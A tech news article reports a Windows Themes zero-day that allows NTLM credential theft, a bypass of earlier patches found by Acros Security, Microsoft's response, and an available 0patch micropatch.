Windows Themes zero-day could have exposed users to credential theft and more

A woman sitting in a chair looking at a Windows 11 laptop
(Image credit: Microsoft)

Security experts have recently uncovered a Windows Themes spoofing zero-day vulnerability that allows threat actors to steal NTLM credentials.

Earlier in 2024, Microsoft discovered, and patched, CVE-2024-21320 - a similar vulnerability with a 6.5 severity score (medium). The patch did not address the issue entirely, and could be bypassed, resulting in the discovery of CVE-2024-38030. Microsoft released the fix for this hole in July 2024.

Now, security researchers from Acros Security revealed how, as they were tinkering with the patch for CVE-2024-21320, they found “an additional instance of the very same problem that was still present on all fully updated Windows versions, up to currently the latest Windows 11 24H2.”

Micropatch available

NTLM (NT LAN Manager) is a suite of security protocols used for authentication, integrity, and confidentiality in Windows networks. It’s an older protocol, primarily replaced by Kerberos in modern systems, but it is still supported for backward compatibility.

The Register reached out to Microsoft regarding this discovery, and was told the OS maker was looking into it: "We're aware of this report and will take action as needed to help keep customers protected," a Microsoft spokesperson told the publication.

In the meantime, 0patch has developed a micropatch that fixes the issue, so those of you who are worried about the bug and don’t want to wait for Microsoft, can install this one in the meantime.

"Exploitation of this zero-day is identical to the previous ones previously reported by Akamai," Acros said.

The vulnerability can be exploited rather easily, although it does require some user interaction, the researchers explained. "The user must either copy the theme file (e.g., from an email message or chat) to a folder or desktop on their computer, or visit a malicious web site that automatically downloads the file to their Downloads folder. It's not entirely without user interaction,” they told the publication.

More from TechRadar Pro

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.